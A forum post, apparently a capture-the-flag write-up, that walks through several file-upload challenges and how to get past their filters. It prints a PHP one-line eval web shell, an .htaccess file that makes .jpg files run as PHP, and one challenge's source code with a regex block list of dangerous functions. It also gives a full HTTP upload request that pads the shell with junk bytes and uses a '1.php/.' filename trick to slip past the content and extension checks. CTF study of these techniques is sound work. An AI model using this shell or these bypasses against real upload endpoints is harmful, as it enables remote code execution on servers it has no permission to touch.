文件上传标题练习

去皮卡多  论坛元老 | 2025-1-5 08:55:25 | 显示全部楼层 | 阅读模式
打印 上一主题 下一主题
楼主

主题 1808|帖子 1808|积分 5424

标题练习

[SWPUCTF 2021 新生赛]easyupload1.0

   MIME(Content-Type)绕过
  限制了Content-Type,修改为Content-Type: image/jpeg即可
写入的一句话木马
  1. <?php @eval($_REQUEST['1']);?>
复制代码
获取flag:
查看phpinfo中的情况变量,这里利用蚁剑连接查找里面的flag是假的

[SWPUCTF 2021 新生赛]easyupload2.0

   文件后缀名绕过
  限制了文件后缀名,将.php后缀修改为.pht、.phtm、.phtml等都可以绕过
一句话木马同上,然后利用蚁剑进行连接
[SWPUCTF 2021 新生赛]easyupload3.0

   .htaccess绕过
  上传一个.htaccess
  1. <FilesMatch "jpg">
  3.   SetHandler application/x-httpd-php
  5. </FilesMatch>
复制代码
再上传一个.jpg后缀的木马之后连接即可。
[强网杯 2019]upload

蜀道山2024奶龙牌WAF

   添加大量垃圾字符绕过
  给了源码
  1. <?php
  2. if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['upload_file'])) {
  3.     $file = $_FILES['upload_file'];
  5.     if ($file['error'] === UPLOAD_ERR_OK) {
  6.         $name = isset($_GET['name']) ? $_GET['name'] : basename($file['name']);
  8.         $fileExtension = strtolower(pathinfo($name, PATHINFO_EXTENSION));
  10.         if (strpos($fileExtension, 'ph') !== false || strpos($fileExtension, 'hta') !== false) {
  11.             die("不允许上传此类文件!");
  12.         }
  15.         if ($file['size'] > 2 * 1024 * 1024) {
  16.             die("文件大小超过限制!");
  17.         }
  19.         $file_content = file_get_contents($file['tmp_name'], false, null, 0, 5000);
  22.         $dangerous_patterns = [
  23.             '/<\?php/i',
  24.             '/<\?=/',
  25.             '/<\?xml/',
  26.             '/\b(eval|base64_decode|exec|shell_exec|system|passthru|proc_open|popen|php:\/\/filter|php_value|auto_append_file|auto_prepend_file|include_path|AddType)\b/i',
  27.             '/\b(select|insert|update|delete|drop|union|from|where|having|like|into|table|set|values)\b/i',
  28.             '/--\s/',
  29.             '/\/\*\s.*\*\//',
  30.             '/#/',
  31.             '/<script\b.*?>.*?<\/script>/is',
  32.             '/javascript:/i',
  33.             '/on\w+\s*=\s*["\'].*["\']/i',
  34.             '/[\<\>\'"\\\`\;\=]/',
  35.             '/%[0-9a-fA-F]{2}/',
  36.             '/&#[0-9]{1,5};/',
  37.             '/&#x[0-9a-fA-F]+;/',
  38.             '/system\(/i',
  39.             '/exec\(/i',
  40.             '/passthru\(/i',
  41.             '/shell_exec\(/i',
  42.             '/file_get_contents\(/i',
  43.             '/fopen\(/i',
  44.             '/file_put_contents\(/i',
  45.             '/%u[0-9A-F]{4}/i',
  46.             '/[^\x00-\x7F]/',
  47.             // 检测路径穿越
  48.             '/\.\.\//',
  49.         ];
  52.         foreach ($dangerous_patterns as $pattern) {
  53.             if (preg_match($pattern, $file_content)) {
  54.                 die("内容包含危险字符,上传被奶龙拦截!");
  55.             }
  56.         }
  58.         $upload_dir = 'uploads/';
  59.         if (!file_exists($upload_dir)) {
  60.             mkdir($upload_dir, 0777, true);
  61.         }
  63.         $new_file_name = $upload_dir . $name;
  64.         print($_FILES['upload_file']);
  65.         if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $new_file_name)) {
  66.             echo "文件上传成功!";
  67.         } else {
  68.             echo "文件保存失败!";
  69.         }
  70.     } else {
  71.         echo "文件上传失败,错误代码:" . $file['error'];
  72.     }
  73. } else {
  74.     ?>
  75.     <!-- 文件上传表单 -->
  76.     <!DOCTYPE html>
  77.     <html lang="zh-CN">
  78.     <div class="upload-container">
  79.         <h2>你能逃出奶龙的WAF吗?</h2>
  80.         <form action="" method="POST" enctype="multipart/form-data">
  81.             <label for="upload_file" class="custom-file-upload">选择文件</label>
  82.             <input type="file" name="upload_file" id="upload_file" class="file-input">
  83.             <input type="submit" value="上传文件" class="submit-btn">
  84.         </form>
  85.     </div>
  86.     <script>
  87.         document.querySelector('.custom-file-upload').addEventListener('click', function() {
  88.             document.getElementById('upload_file').click();
  89.         });
  90.     </script>
  91.     </body>
  92.     </html>
  93.     <?php
  94. }
  95. ?>
复制代码
漏洞利用点1:
  1. $name = isset($_GET['name']) ? $_GET['name'] : basename($file['name']);
  3.         $fileExtension = strtolower(pathinfo($name, PATHINFO_EXTENSION));
  5.         if (strpos($fileExtension, 'ph') !== false || strpos($fileExtension, 'hta') !== false) {
  6.             die("不允许上传此类文件!");
  7.         }
复制代码
这段代码获取文件的拓展名,并过滤了ph和hta。
这里可以思考一下让拓展名以后移,比方:1.php.abc
漏洞利用点2:
  1. if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $new_file_name)) {
  2.             echo "文件上传成功!";
  3.         }
复制代码
move_uploaded_file函数是php的一个内置函数,用于将上传的文件从暂时目次移动到指定的目次中。
   当move_uploaded_file函数的参数可控时,可以尝试/.绕过,因为该函数会忽略掉文件末尾的/.
  因此可以构造save_path=1.php/. 如许file_text的值为空,就可以绕过黑名单,而且move_uploaded_file函数会忽略掉文件末尾的/. 实现保存文件为1.php
  绕过方式:
  1. $file_content = file_get_contents($file['tmp_name'], false, null, 0, 5000);
复制代码
因为只读取前5000字节进行校验,可以在一句话木马前面加上脏数据
  1. foreach ($dangerous_patterns as $pattern) {
  2.             if (preg_match($pattern, $file_content)) {
  3.                 die("内容包含危险字符,上传被奶龙拦截!");
  4.             }
  5.         }
复制代码
这里的preg_match函数也可以利用PCRE回溯次数限制来绕过
而且注意文件名称由下面这段代码决定
  1. $name = isset($_GET['name']) ? $_GET['name'] : basename($file['name']);
复制代码
payload数据包:
  1. POST /?name=1.php/. HTTP/1.1Host: gz.imxbt.cn:20116User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brContent-Type: multipart/form-data; boundary=---------------------------3963895074739992901366514230Content-Length: 5770Origin: http://gz.imxbt.cn:20116Connection: closeReferer: http://gz.imxbt.cn:20116/Upgrade-Insecure-Requests: 1Priority: u=0, i-----------------------------3963895074739992901366514230Content-Disposition: form-data; name="upload_file"; filename="1.php/."Content-Type: application/octet-stream1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111<?php @eval($_REQUEST['1']);?>
  2. -----------------------------3963895074739992901366514230--
复制代码
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

正序浏览
返回列表

快速回复

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

去皮卡多

论坛元老
这个人很懒什么都没写!

楼主热帖

标签云

集成商 AI 运维 CIO 存储 服务器
微信订阅号
微信服务号
微信客服
小程序
H5
关于我们 商务合作 网站地图
©Copyright 2022-2024 杭州祥升科技有限公司 版权所有 浙ICP备20004199号
快速回复 返回顶部 返回列表